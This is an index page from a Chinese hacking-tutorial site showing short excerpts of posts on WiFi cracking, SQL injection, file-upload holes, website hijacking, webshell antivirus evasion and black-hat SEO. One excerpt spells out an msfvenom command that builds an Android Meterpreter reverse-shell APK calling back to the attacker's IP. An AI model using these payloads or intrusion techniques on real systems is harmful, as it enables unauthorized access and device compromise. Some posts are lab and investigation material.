中文黑客网 发布于 4-9
![]()
![]()
![]()
![]()
一直准备找个时间来写个wifi破解教程,因为很多人都想学wifi破解,但是网上的教程都太乱,而且弄来弄错容易错,那是对于wifi破解的原理没有充分的认识,这次准备纯码字给大家通俗的讲解wifi破解,破解工具以aircrack-ng为例,这是一个很强大且具有代表性的工具,网上很多其他的破解工具都是基于aircrack-ng的。名词解释无线AP:发射...
阅读(4)
中文黑客网 发布于 4-9
![]()
![]()
![]()
![]()
行动开始先查看kali的ip,我的是1.114 然后输入命令:msfvenom-pandroid/meterpreter/reverse_tcpLHOST=你kali的ipLPORT=5555R>/root/apk.apk5555是设置的端口,可以自己更改 显示这个说明已经生成成功了 然后启动msf...
阅读(11)
中文黑客网 发布于 4-9
![]()
![]()
![]()
![]()
文件上传指将客户端数据以文件形式封装,通过网络协议发送到服务器端。在服务器端解析数据,最终在服务端硬盘上作为真实的文件保存。了解文件上传漏洞产生的原因,掌握漏洞的利用方法。预备知识1. 文件上传漏洞简介 通常web站点会有用户注册功能,而当用户登录之后大多数情况下会存...
阅读(2)
中文黑客网 发布于 4-8
![]()
利用SQL注入漏洞拖库,从而导致数据泄漏。一般的排查方式,我们可以使用关键字进行搜索,找到可疑的url尝试进行漏洞复现,通过Web访问日志来还原攻击路径,从而确定问题的根源。但是,有一个问题却一直困扰着我,攻击者通过SQL注入漏洞到底获取了什么数据?是所有的数据,还只是访问了其中的一张表?理论上,假设所有的url参数请求日志都记录完整的话,只需要...
阅读(13)
标签:SQL注入
中文黑客网 发布于 4-8
![]()
![]()
![]()
攻击者在入侵网站后,常常会通过恶意劫持流量来获取收益,从而实现流量变现。有一些黑帽劫持的手法堪称防不胜防,正常的访问行为很难发现异常。今天给大家分享一下常见的网站劫持手法和排查思路。我们可以按照基于不同隐藏目的的常见劫持手法,来做一个简单的分类:1、将爬虫与用户正常访问分开,实现搜索引擎快照劫持2、将移动端与PC端的访问分开,实现移动端的流量劫持...
阅读(14)
标签:网站劫持
中文黑客网 发布于 4-3
![]()
![]()
![]()
![]()
前言假期马上结束了,闲暇之时我自己尝试着搭建了一个内网渗透的靶场。靶场是根据比较新的漏洞进行搭建的,质量自以为还可以。目前此靶场已在vulnstack开源,下载链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/9/文中若有不当之处还请各位大佬多多点评我的博客:https://whoamianony...
阅读(37)
中文黑客网 发布于 4-3
![]()
![]()
![]()
![]()
前言攻防演练里最重要的环节莫过于信息收集,熟话说,要想打点打得好,信息收集少不了。在各大公司招兵买马之际,各位师傅也来查缺补漏,信息收集你真的都会了嘛?搜索引擎这里我们使用fofa来举例,为什么使用fofa来举例呢,不是因为fofa有多好(真香),是因为咱只买了fofa的会员。fofa既可以搜索到部分子域名,也可以搜索到目标的各种系统,如OA、后...
阅读(30)
中文黑客网 发布于 3-27
![]()
![]()
![]()
![]()
0x00:前言由于杀软的规则在不断更新所以很多之前的过杀软方法基本上都不行了而且随着php7逐渐扩张assert马也将被淘汰所以本文将提出几种免杀思路效果很好而且不会被杀软的正则和沙盒规则约束。0x01:自定义加密Bypass部分杀软会直接将一些编码函数如Base64、编码后的关键字或组合函数加入了规则比如某dir+比如这个都能被检测出是shel...
阅读(64)
中文黑客网 发布于 3-27
![]()
溢出:确切的讲,应该是“缓冲区溢出”。简单的解释就是程序对接受的输入数据没有执行有效的检测而导致错误,后果可能是造成程序崩溃或者是执行攻击者的命令。大致可以分为两类:(1)堆溢出;(2)栈溢出。弱口令:指那些强度不够,容易被猜解的,类似123,abc这样的口令(密码)社工:社会工程学一种通过对受害者心理弱点、本能反应、好奇...
阅读(56)
中文黑客网 发布于 3-21
![]()
今天有许多人问我:“我看了你的文章了,但是我是新人,有没有什么学习方法啊?”我回答的是;“当然有啊,不过人和人不同,方法是自己总结出来的,就和我前面文章中介绍的名词一样,都是我在学习中根据自己的经验和对他的认识总结出来的。”下面呢我就把我自己的学习经验写出来给大家参考下,大家可以根据我的方法去总结套...
阅读(124)
中文黑客网 发布于 3-21
![]()
上传漏洞是在一个ASP页面后面输入upfile.asp然后看回显,(注意一点:就是在加这个后缀前,把IE中友好显示关了!要不没有效果的!)如果没有显示或者出现个什么“请登陆后使用”这样的呢,就是没有漏洞的拉。那么有漏洞的回显是什么样子的呢?如果有漏洞你会看到上面有个这样的字 请先选择你要上传的文件[重新上传]如果看到这个...
阅读(54)
中文黑客网 发布于 3-21
![]()
上一节讲了暴库漏洞,现在来讲讲注入,现在注入漏洞简直多的和蚂蚁一样,随便找个站,就可能利用注入漏洞得到后台或者WEBSHELL,所以我们怎么能忽视这个漏洞呢?呵呵.下面就是介绍注入漏洞的用法。 在前面介绍过怎样辨别网站有注入漏洞,现在再来讲下,加深下印象,现在举的例子,比如我们检测的是这个站http://www.123.com/那么我们就先大概...
阅读(44)
中文黑客网 发布于 3-21
![]()
今天就来讲下以前的一个漏洞,但是很经典,现在也有不少网站仍然存在这样的漏洞。就是暴库漏洞。 什么是暴库呢?就是利用不正当的手段使对方把数据库的绝对路经显示出来,然后我门知道了绝对路径,就可以下载下来,这样这个网站的数据库中的资料就被我门轻松掌握了。 那么怎么样使用暴库呢?这个在新人2中有介绍,今天就来说说具体的用法。首先要知道怎样才能暴库呢?...
阅读(40)
中文黑客网 发布于 3-21
![]()
首先介绍下什么样的站点可以入侵:必须是动态的网站比如asp php jsp这种形式的站点后缀为.htm的站点劝大家还是不要入侵了吧(入侵几率几乎为0) 入侵介绍:1。上传漏洞2。暴库3。注入4。旁注5。COOKIE诈骗 1:上传漏洞,这个漏洞在DVBBS6.0时代被黑客们利用的最为猖獗,利用上传漏洞可以直接得到WEBSHE...
阅读(54)
中文黑客网 发布于 3-21
![]()
![]()
![]()
![]()
一、漏洞简介二、漏洞影响CmsEasy7.3.8三、复现过程漏洞代码位于lib/admin/language_admin.php的add_action函数在测试后发现CmsEasyV7.3.8框架已经对SQLi进行了转义和过滤,包括(select、*、sleep等等),为了确定具体的过滤名单,从源码中查找检测函数但是经过一番搜索后,源码中发现实际...
阅读(42)
中文黑客网 发布于 3-17
![]()
主要内容:1、黑帽SEO常识讲解2、老域名选择(从年龄、外链、历史)3、网站服务器配置(Centos)【安装宝塔LINUX】4、塔使用技巧及网站程序安装【基于Z-BLOG】5、白帽实战误区扫盲6、网站程序比较(dedecms,zblog,wordpress)7、单站排名思路及实战操作【养站思路】8、单站操作及改站9、泛目录排名原理及实战讲解(细节...
阅读(34)
中文黑客网 发布于 3-17
![]()
![]()
![]()
![]()
思维导图一.Windows(lcx)1.准备环境win7(web服务器):有两块网卡,一块连接内网,一块连接外网内网ip:192.168.52.4外网ip:192.168.0.103winserver3(内网服务器):只有内网一块网卡,win7能访问这个服务器内网:192.168.52.3win10咱们验证的机器将工具都拉进win7和win3中,...
阅读(61)
中文黑客网 发布于 3-17
![]()
一.介绍DN-scan域名爆破工具,是一款支持多线程、可选择爆破等级等域名爆破工具。支持操作系统:Windows二.使用方法Usage:dn-scan.exe-d<domin_url>-l<DetectLevel>-bOptions:-h,--helpshowthishelpmessageandexit-dDOMIN_UR...
阅读(38)
中文黑客网 发布于 3-17
![]()
![]()
![]()
![]()
近期在学习Linux提权,完成了vulnhub上的42challenge靶场。该靶场在web渗透阶段表现的中规中矩,但在获得shell后的提权过程中,表现很出色。提权题目设计的逻辑严谨(不会出现突然的脑洞让你卡住),注重基础知识的考察,要求的知识面也很广,涉及到密码破解、程序逆向分析、第三方应用提权、进程提权、ssh免密登录、LinuxACL访问...
阅读(22)
中文黑客网 发布于 3-17
![]()
![]()
![]()
![]()
今天分享的文章是对HTTPPUT方法开启漏洞的多种应用讲析,在实战场景中,首先我们要确定目标网站是否启用了HTTPPUT方法,如果启用的话,我们就可以结合多种利用工具和相关方法,向目标网站上传Meterpreter反弹shell,实现进一步的渗透控制。一起来看看。HTTPPUT方法介绍HTTPPUT方法最早目的用于文件管理操作,可以对网站服务器中...
阅读(26)
中文黑客网 - 黑客技术教程学习基地 - CNHACK - 中文黑客网
